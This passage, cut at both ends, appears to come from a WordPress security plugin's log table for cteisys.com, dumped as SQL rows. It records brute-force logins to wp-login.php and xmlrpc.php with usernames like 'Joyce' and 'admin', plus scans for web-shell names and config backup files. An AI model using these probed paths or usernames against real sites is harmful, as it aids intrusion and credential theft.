0),('209.141.37.194',3515688386,'Joyce',0,1665766258.9065,51,'rwUX8mveV6qcWpNykY51JOCj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.172.138.41',2997652009,'',0,1665798772.2861,55,'OPAUITR7w0s5khnBta3Gpv8j','','19|0|0|0|cteisys.com/wp-queryall.php',0,19,0),('20.19.122.234',336820970,'',0,1665768499.4857,55,'LgFiepDK4wZo08n1kRtvGIrm','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('20.19.122.234',336820970,'',0,1665768497.2361,55,'JYOVu9EcK8o23dfpFl1nXaQ7','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('209.141.36.190',3515688126,'Joyce',0,1665767356.9838,51,'x89V0Tqki1z7oBFDlnvEMs5u','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.238.229.54',3002000694,'joyce',0,1665767101.9989,152,'Bu4zqFbSwhDs9KfnN62LodxH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.172.138.41',2997652009,'',0,1665798771.2216,18,'293qGeSjNZxkhuHMWJrzI7Yn','','13|0|0|0|cteisys.com/radio.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798770.1334,100,'Wg8lDqR0mw3oEd5nL7MeCBQ1','','13|0|0|0|cteisys.com/radio.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798769.0142,18,'AZqkPKlywCdY4BLgUexiz9Q2','','13|0|0|0|cteisys.com/about.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798767.8056,100,'tniRDBWwrfy7PCoTAdGEV9Qh','','13|0|0|0|cteisys.com/about.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798766.7037,18,'dxwB5kbn3lae4sQ0R7uvojMD','','13|0|0|0|cteisys.com/css/votes.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798765.6423,100,'3phENatI0nTlVqrUgyZmJYA8','','13|0|0|0|cteisys.com/css/votes.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798764.5370,18,'qPJ62t5urIksfYGniZLTlv7D','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798764.5365,71,'qPJ62t5urIksfYGniZLTlv7D','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798763.4715,100,'coUHliDMEapv5ktmXr2snPj4','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('185.200.116.211',3116922067,'Joyce',0,1665774268.2244,152,'vdXIYjziOxghrwk2A9nPEJU8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.200.117.131',3116922243,'Joyce',0,1665773118.2168,152,'0pJ81F2MTlLxw3oySGqXhNrn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.172.138.41',2997652009,'',0,1665798763.4709,71,'coUHliDMEapv5ktmXr2snPj4','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('213.152.186.19',3583556115,'Joyce',0,1665775966.2525,152,'zqQVu9XskOZim3NMtYGI2AEj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.172.138.41',2997652009,'',0,1665798762.4051,18,'inu9oDsLpbYPBfzZVEwkyJ3H','','13|0|0|0|cteisys.com/wikindex.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798761.2099,100,'FaEuRmBhMdZCVv1DJne5q4fG','','13|0|0|0|cteisys.com/wikindex.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798760.1018,18,'CgwdXAGz1hY9uQoDFWBOUImN','','13|0|0|0|cteisys.com/admin.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798758.9503,100,'lhv1p2BoSLqiOFes5ucd8ZRj','','13|0|0|0|cteisys.com/admin.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798757.8863,18,'Qmlc5POXxzFhtM7p839TSKGb','','13|0|0|0|cteisys.com/load.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798756.6975,100,'OSGxT7QoyspZ0EX3WICMPwuK','','13|0|0|0|cteisys.com/load.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798755.5954,18,'TQMbs30Sj6NXIgHVnJZAKBi1','','13|0|0|0|cteisys.com/',0,13,0),('178.172.138.41',2997652009,'',0,1665798754.5369,100,'HCQMRzBvcDi3a8qThOUXPw2e','','13|0|0|0|cteisys.com/',0,13,0),('178.172.138.41',2997652009,'',0,1665798753.4920,18,'YclqV81Uht6n7KjFQ5SMHEO9','','13|0|0|0|cteisys.com/1index.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798752.3660,100,'P691qJyaRivI7ApQ0KEgtScZ','','13|0|0|0|cteisys.com/1index.php',0,13,0),('193.37.254.35',3240492579,'Joyce',0,1665780906.3701,152,'uZkaJqPLotAn73XH6zwCyp5R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.127.104.80',2155833424,'Joyce',0,1665778645.0324,152,'kDxPU2o7dsqHbnXlAemaJj9v','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.172.138.41',2997652009,'',0,1665798751.2816,18,'Nnt3E9GDPC7uUzoYWA5lhy2T','','13|0|0|0|cteisys.com/2index.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798750.0397,100,'2kbeqXQHoKOvl9cMTGdaFNit','','13|0|0|0|cteisys.com/2index.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798748.9696,18,'daRZPNWIBn1ebJxuwfVGyYzh','','13|0|0|0|cteisys.com/votes.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798747.8754,100,'GzYE0n7FeiBfljSU9vXr2tKJ','','13|0|0|0|cteisys.com/votes.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798746.7937,18,'BetQXfq6kNRIELw5WoHFAlUi','','13|0|0|0|cteisys.com/css/load.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798745.6931,100,'FlISrUJuPL7tdcGipofmEgDX','','13|0|0|0|cteisys.com/css/load.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798744.5511,18,'9jwmbaGuhyzJDTUp510tNM8g','','13|0|0|0|cteisys.com/contents.php',0,13,0),('104.244.77.229',1760841189,'Joyce',0,1665784995.9913,51,'k6jm0KMyD3xEJQupbztYvV1U','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.211',3583549907,'joyce',0,1665788328.7046,152,'DpQHT6tLxhBl1NrCG3AXdn0U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.187.215',3583556567,'Joyce',0,1665785025.6754,152,'uUxovXbBpGsiqWHykLtTfZdj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.172.138.41',2997652009,'',0,1665798743.4861,100,'2wBcdXDhlAP956y0LvKRTbYN','','13|0|0|0|cteisys.com/contents.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798742.3918,18,'rlYAVsNo2bamR7G8UjpFchef','','13|0|0|0|cteisys.com/css/contents.php',0,13,0),('178.172.138.41',2997652009,'',0,1665798741.2520,10,'9g7HuXTBSYcVL6QkxpbteFzR','','707|0|0|0|cteisys.com/css/contents.php',0,707,0),('178.172.138.41',2997652009,'',0,1665798741.2501,55,'9g7HuXTBSYcVL6QkxpbteFzR','','19|0|0|0|cteisys.com/css/contents.php',0,19,0),('178.172.138.41',2997652009,'',0,1665798740.2027,55,'i52Xo43arTpWOh7CvUDPA6ms','','19|0|0|0|cteisys.com/css/index.php',0,19,0),('208.67.106.91',3494079067,'',0,1665794048.0924,55,'UkTjEfB7ysGCeFP5izutlLvN','','19|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('209.141.49.253',3515691517,'Joyce',0,1665794021.8628,51,'o5DSvlYNactjB7Wmd8zQPyxe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.189.13.99',1807551843,'Joyce',0,1665793107.8249,51,'RUFj9PmOhd48LMV3ouGatnpN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.47.94',3515690846,'Joyce',0,1665792190.7483,51,'dVjpEGaLy0RvtliIebTJmcDP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.50.19',3328324115,'Joyce',0,1665792162.7437,51,'ZbqoOz2wpe4U9s7GlXgYraCQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.172.138.41',2997652009,'',0,1665798739.0763,55,'p1MhXzfArUIOVKG67yLdPw0i','','19|0|0|0|cteisys.com/css/index.php',0,19,0),('178.172.138.41',2997652009,'',0,1665798737.8856,55,'gdDe5fabZrR0ick8t3AsJYOp','','19|0|0|0|cteisys.com/years.php',0,19,0),('178.172.138.41',2997652009,'',0,1665798736.8154,55,'Ur6JZakFnWyXsceH0CoG3PQf','','19|0|0|0|cteisys.com/years.php',0,19,0),('107.189.13.99',1807551843,'Joyce',0,1665798400.4356,51,'LladIWD6HCeYK5wcqjpN0nTS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('31.3.152.100',520329316,'joyce',0,1665797759.5274,152,'QFMcZJAo7Kb5ySjnsOvkRuNa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.249.230.12',3355043340,'joyce',0,1665797722.4689,152,'uUDkHfXpl24obJrQcgVKCySF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.3.152.100',520329316,'joyce',0,1665797722.4653,152,'xBfscpYECbuHISz8476o9XN1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'Joyce',0,1665803685.3859,51,'BTLOS1PXChtiNEcljQ5Kuq43','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.244.77.229',1760841189,'Joyce',0,1665803020.2185,51,'hf0SQRyXiM1xsr3B9KOpGzoN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.47.94',3515690846,'Joyce',0,1665809999.7190,51,'LOGEM5RxySWo4vAdgkZ6YPJn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.19.122.234',336820970,'',0,1665809565.4431,55,'2ra4YMJHpghTfC09OkAWBivm','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('20.19.122.234',336820970,'',0,1665809562.5001,55,'VxWjzlYc0smFE2bDnt61BrdA','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('205.185.116.156',3451483292,'Joyce',0,1665809257.4890,51,'N6t0KBWOwAiPxVhFJ8G9Qdsu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.19.179.243',2249438195,'joyce',0,1665809116.8369,152,'ujKPROw5JsVBvZDb3TxyEeio','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.138',3583549834,'joyce',0,1665808467.3739,152,'bgT8S0z3NsBJdkOAaEqKyr6Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.10',3583549962,'Joyce',0,1665811080.9043,152,'vT4HRntiuVPJeWO0pYNmqFdB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.187.230',3583556582,'Joyce',0,1665815096.8171,152,'JLD3CzfqEMNIvKto7POdp2ym','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.162.36.174',2342659246,'',0,1665823519.0543,100,'zPUApH6fNRxv3OlcZ9ILXJ8i','','13|0|0|0|cteisys.com/plugins/content/apismtp/apismtp.php.suspected',0,13,0),('139.162.36.174',2342659246,'',0,1665823518.1128,10,'xkfQ4GzilqB3eW1pmIu7XEnh','','707|0|0|0|cteisys.com/wp-content/plugins/apikey/apikey.php.suspected',0,707,0),('139.162.36.174',2342659246,'',0,1665823518.1107,55,'xkfQ4GzilqB3eW1pmIu7XEnh','','19|0|0|0|cteisys.com/wp-content/plugins/apikey/apikey.php.suspected',0,19,0),('139.162.36.174',2342659246,'',0,1665823517.2728,55,'2A3wNVHCs6ovXzBkx1apKt8e','','19|0|0|0|cteisys.com/plugins/content/apismtp/apismtp.php',0,19,0),('139.162.36.174',2342659246,'',0,1665823516.4456,55,'VU3mXcKHCx9ukgdFP47I0eiw','','19|0|0|0|cteisys.com/wp-content/plugins/apikey/apikey.php',0,19,0),('139.162.36.174',2342659246,'',0,1665823496.8567,55,'fxHrXeSJKaF3Z5DhgWEbocsk','','19|0|0|0|cteisys.com/wp-plain.php',0,19,0),('139.162.36.174',2342659246,'',0,1665823492.8898,55,'HzT6o5itB9gR3ZWkeFmVXnv7','','19|0|0|0|cteisys.com/wp-plain.php',0,19,0),('104.254.90.243',1761499891,'Joyce',0,1665822922.5488,152,'5GL4SI7mbWNT6UoZ0D9RgF3V','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.101',3583549797,'Joyce',0,1665822292.3989,152,'XNBvkJ690cMKH3EpP4ZYSGIy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.101',3583549797,'joyce',0,1665822206.7741,152,'aZL1wWTcmPXbAjEKV0xQyuU6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.55.206',3515693006,'Joyce',0,1665830883.1101,51,'oyA5w01XxplRZcad6k2NG4Tt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.120.53',3451484213,'Joyce',0,1665835083.4329,51,'bgfUq5wA39k0dB8jz6tS1aWo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.38.20.161',3257275553,'',0,1665833223.5813,55,'H0aJfiuWNhIpwM7OUmcZQqY4','','19|0|0|0|cteisys.com/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php',0,19,0),('213.152.161.211',3583549907,'joyce',0,1665832518.7481,152,'STIlPR3K6jbA2UW5Q1Moyfvc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.189.112.19',3116199955,'joyce',0,1665837980.2054,152,'TImNsZfd7yn6bi0RQJCH2reM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.154.177.165',1738191269,'newd',0,1665882563.1119,152,'g9Qwk43yZFMvj72zu6AI5SGB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.154.177.165',1738191269,'newd',0,1665882563.0801,152,'OXAz18v0hmUtw4l9LsNFQZSb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.59.165.88',3258688856,'newd',0,1665881625.6609,152,'2rdhQEPcwLtoRVyIxY1kJTi0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.31.46.140',1428106892,'',0,1665881399.8959,55,'BYg75htrTUSmdl3ipNGcQkED','','19|0|0|0|cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881392.2177,55,'yoK93ksPwa0HnWOCqi8bAvIt','','19|0|0|0|cteisys.com/wp-content/langar.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881390.0225,100,'2tk7URnagIerKY6Cl5F9Bywu','','13|0|0|0|cteisys.com/test.php',0,13,0),('85.31.46.140',1428106892,'',0,1665881382.6206,55,'x3WjSmco26lsvqbZzrBYdGwL','','19|0|0|0|cteisys.com/config.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881380.2748,55,'h2nqlgVaJAotX5K0RfNpEzdF','','19|0|0|0|cteisys.com/upload.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881378.6602,55,'lw8bfJperXd4SMDUQt6IxC3H','','19|0|0|0|cteisys.com/up.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881375.0957,55,'86Ia1dtQgsKyfvT9OVX5LAWo','','19|0|0|0|cteisys.com/wp-includes/small.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881373.6366,55,'UC3IFSZLz8i9R0Al2vjnskX5','','19|0|0|0|cteisys.com/wp-includes/lfx.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881372.5440,55,'vROoZNirbQn1YxBahA4PSIsu','','19|0|0|0|cteisys.com/wp-content/mu-plugins/db-safe-mode.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881371.1127,55,'zim7ASvOILQR5f3hEu1Ul2TX','','19|0|0|0|cteisys.com/legion.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881369.2882,100,'mN8FxHnhA21zYbjiQSKCGg4a','','13|0|0|0|cteisys.com/wp-content/wp-old-index.php',0,13,0),('85.31.46.140',1428106892,'',0,1665881367.0586,55,'7JaPdlpBAGf2OWZVnLIQub1k','','19|0|0|0|cteisys.com/haders.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881361.6729,100,'IozEPDZfF6UCJhKQmXvy7Nxn','','13|0|0|0|cteisys.com/wp-content/plugins/wpconfig.bak.php',0,13,0),('85.31.46.140',1428106892,'',0,1665881359.6252,100,'u5HPiCGdkIxQUTNwBfy2X4rs','','13|0|0|0|cteisys.com/wp-includes/wpconfig.bak.php',0,13,0),('91.214.169.69',1540794693,'joyce',0,1665840942.6543,152,'U10vdpaBKTiIgcyeYQbnzDPo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.75.221.59',3091979579,'joyce',0,1665839935.0978,152,'ijtRZTWhwE5zUFJQuXv9HOKd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.31.46.140',1428106892,'',0,1665881356.8534,55,'OGb6qrmEZA4Nd1FjPtulzWSi','','19|0|0|0|cteisys.com/wp-content/plugins/ubh/up.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881351.4412,18,'FUfxvygJY9c2G6rWSQTVlpMo','','13|0|0|0|cteisys.com/wp-includes/css/wp-config.php',0,13,0),('18.224.85.64',316691776,'newd',0,1665867527.3917,152,'9xfkdF3aGrZnRhuKCs7mXAEt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1665867271.1353,152,'1PsOQHDn34TiwXEIbKyoBmqZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1665867271.1078,152,'5eQ9bVBqakj2OCAWE4lgFi6S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.55.206',3515693006,'Joyce',0,1665866513.2740,51,'sgnVrD3680XP2jMSTxQLmo5F','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.166.182.177',1738978993,'newd',0,1665866482.9250,152,'CEpD9qYGIfyZm5VzlAvhURbX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.107.33.26',795549978,'newd',0,1665866482.3312,152,'FVvDstGz3LlPA2fNjMHnoYk4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.116.156',3451483292,'Joyce',0,1665865617.4162,51,'8NFURSgWp3OVXuzMlwZhnrEi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.19.179.179',2249438131,'Joyce',0,1665865542.4291,152,'bXfSPKLQAJyG0Yj2Ihtz357c','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.129.178.69',1736553029,'newd',0,1665865503.6287,152,'VcwGjatWkbzLdRuq8Nn5KexU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('210.211.113.130',3537072514,'newd',0,1665865266.6433,152,'Hu6yD4fAeaCPJtrvcE08GboI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('110.40.133.172',1848149420,'newd',0,1665864544.5833,152,'z8fYEhGeLHrWNJ9nSpdAm65X','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.228.23',2335958039,'newd',0,1665864544.5797,152,'rTsgjEiPuqxBNWUkXoRdtQH2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.76.77.160',3108785568,'newd',0,1665860721.3736,152,'dEqRJTUcFQ4h5meLD9sINf8r','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.76.77.160',3108785568,'newd',0,1665860721.3747,152,'KMUehoBfrksPpbugJ0cSdnY4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.45.47',3515690287,'Joyce',0,1665849453.9692,51,'dRyJ0XFKvkHiE9hlNbsSnwcA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.162.209.171',2997014955,'Joyce',0,1665849413.6274,152,'HJV06rSNFTwvU72hfozCEZ4L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.189.112.11',3116199947,'joyce',0,1665849269.5084,152,'86V34sHjubfdYAT1kDSWFPUc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.217.147.17',1608094481,'admin',0,1665848965.0878,152,'ASZ2Gq4mcY7KEOdbUnRw5PHW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.52.160.32',2973016096,'admin',0,1665848965.0877,152,'jbBpuOCG37Y50ydc2gW84UEh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'Joyce',0,1665847012.0763,51,'WDT1L7kFQUqjeszo95ulAyEI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.243.26.114',1760762482,'newd',0,1665852934.7012,152,'zo3ev7xyw6i90TaURADk5num','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.25.182',1556945334,'newd',0,1665852934.6633,152,'8lzmbUuT9dZC2xqpGisYOjtv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.166.182.177',1738978993,'newd',0,1665852668.5179,152,'fum1Vi3cZkw0axI8pjJU2PvL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.166.182.177',1738978993,'newd',0,1665852668.4540,152,'aCnVSlPYjIh7suEoRtWcHBX3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.144.21.93',2727351645,'admin',0,1665851779.8247,152,'4om1WSDCeQRHzV8kUFM6hPXa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.62.247',2733719287,'admin',0,1665851779.7927,152,'EVAYWeFy9cCqBsHzrtdniwv1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.239.34',2671898402,'admin',0,1665851367.8231,152,'AOIGDmyHJ7fxYvcCEznoB52k','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.134',1364735110,'admin',0,1665851367.8231,152,'S496VugXlIDv2yZfWsdCPoEA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.49.253',3515691517,'Joyce',0,1665849733.7852,51,'t2a9UweXQYN5s37GuJzO6d8C','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('108.167.132.70',1822917702,'newd',0,1665859933.0934,152,'48ujWXyrDxs6aHIJETgt3GvZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('108.167.132.70',1822917702,'newd',0,1665859932.6173,152,'CyqBLoNtZVFWclUi1A2nJbgK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.113.147',3225448851,'newd',0,1665859348.1589,152,'waZTeo5jyN3lVf7J1EQCikPp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.9.158.112',1208589936,'newd',0,1665859137.2191,152,'SpnEOiuFdRblrITP6h47wBZs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.166.98',2650121826,'newd',0,1665856592.4989,152,'N8TELxO4isFnGpzHaokDhl9P','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.166.98',2650121826,'newd',0,1665856592.4555,152,'SbNAMX60JOdhB7WUyQ9tDVHE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.226.109',2733761133,'newd',0,1665854945.3589,152,'1ZSKj7OrzUI2u0pPb5TFhGNt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.132.194',3265496258,'newd',0,1665854942.8073,152,'IPbZ0wN8YMXVyive3sTmnWpS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.101.103.136',778397576,'newd',0,1665854654.4875,152,'tgzTupHhikyCOYrKB4RcQ052','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.101.103.136',778397576,'newd',0,1665854654.4015,152,'SDfxvPsAYbJMHEwFodWBajCe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.171.170.94',3198921310,'newd',0,1665853900.3941,152,'fwXMhUy8NDkTAL7Si9HmOzgE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.145.54.196',3515954884,'newd',0,1665853900.3496,152,'hpEbIJLa2l0uUKTZ91gfWCQM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.2.47.78',1996631886,'newd',0,1665853646.8958,152,'hifbd0QAWqsTMjZ1S8IrmD3z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.2.47.78',1996631886,'newd',0,1665853646.8886,152,'aG5zW42K8yoBZAHPvpVeYgIc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.9.158.112',1208589936,'newd',0,1665859137.1893,152,'8GZ70BCFpnzyAVLRPciYX2Oo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.36.81.21',3106165013,'',0,1665858856.9186,55,'r2u0P5moSEveIW8ybCApVJhq','','19|0|0|0|cteisys.com/wp-content/uploads/upload_index.php',0,19,0),('157.245.140.35',2650115107,'newd',0,1665858546.2155,152,'VdsR8yD2rgxSpqvh6WFlUMt0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.37.74.123',908413563,'newd',0,1665858546.1627,152,'upskJFW78YXSdcrgtOyRnv6B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.162.205.236',3399667180,'newd',0,1665858334.0352,152,'Q5fICWDh2isHetBvbjoOxaFJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.162.205.236',3399667180,'newd',0,1665858334.0351,152,'XOVEyACkM90opQUrzsS5WLaI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.195.135.67',600016707,'newd',0,1665857720.4055,152,'M0ko1tg8C3dETYsmZxqaQS9D','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.174.216',2733747928,'newd',0,1665856810.9952,152,'SPvzyN3uGXnVcDJQ2qREkmrx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.52.252.69',221576261,'',0,1665864413.7118,55,'sd0wUHlZnvaVyR8EkjMTCut9','','19|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('8.210.102.36',148006436,'newd',0,1665864282.7972,152,'UEa1dTfRumyYMIbw304jivPZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.14.71.142',2718844814,'newd',0,1665863591.6526,152,'Mo2Q3SOmI7CdL8cwhRsU4zr1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.150.28',1868207644,'newd',0,1665863375.2332,152,'LJAfwne5dz7rxjtipNEMFgch','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.244.162.250',2415174394,'newd',0,1665862692.2535,152,'F8Gw9eZXSPl1txDkjoq35AvU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.230.247.143',2531719055,'newd',0,1665862447.9483,152,'oJ3KIkzhwRPrg2fHiQNAMG45','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.171.181.53',1739306293,'newd',0,1665862444.5272,152,'JQoLbxg71c3VT8DRlGYEPv0O','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.106.216',2806475480,'newd',0,1665861781.1277,152,'NEkpLd7lJ3jzowHm4e0YOvTD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.255.178.218',1962914522,'newd',0,1665861565.5980,152,'HhgDdbisJwE1ljtLyvZG6N9M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.255.178.218',1962914522,'newd',0,1665861565.5042,152,'MBnJ4CjDQoORU28LeHq5TbGK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.107.33.26',795549978,'newd',0,1665860927.7356,152,'TXD8PbNsZW90hCvx7Qu3OgtJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.187',1046910139,'joyce',0,1665864267.0416,152,'QoRxn9v3iFHhAbWya0uClZNr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.31.46.140',1428106892,'',0,1665881315.5704,55,'yxTjHVR8ENMUebDvrmhGzJ6p','','19|0|0|0|cteisys.com/wp-content/plugins/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881309.1096,55,'p6xeuAVEXfy34CYjkUHmcKvs','','19|0|0|0|cteisys.com/wp-content/themes/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881305.7369,55,'23GPImr604Bdev5tOLHoV8Sc','','19|0|0|0|cteisys.com/wp-includes/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881304.2502,55,'G5Lo9eBIZ0V3OgmRjM241DEC','','19|0|0|0|cteisys.com/wp-content/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881302.1802,55,'yobNmZUsV2E6r1jkDgQRcnFi','','19|0|0|0|cteisys.com/wp-admin/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881300.7188,55,'fYjQ7dG9AS5wXDsHMBnLFzme','','19|0|0|0|cteisys.com/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665881297.5952,55,'J0unmzMqCYysdSiKgtljD498','','19|0|0|0|cteisys.com/old-index.php',0,19,0),('162.241.120.248',2733734136,'newd',0,1665871555.9806,152,'vHbFDmPjZIiWo6EQUCg2eBaT','','0|0|0|0|cteisys.com/xmlrpc.php',0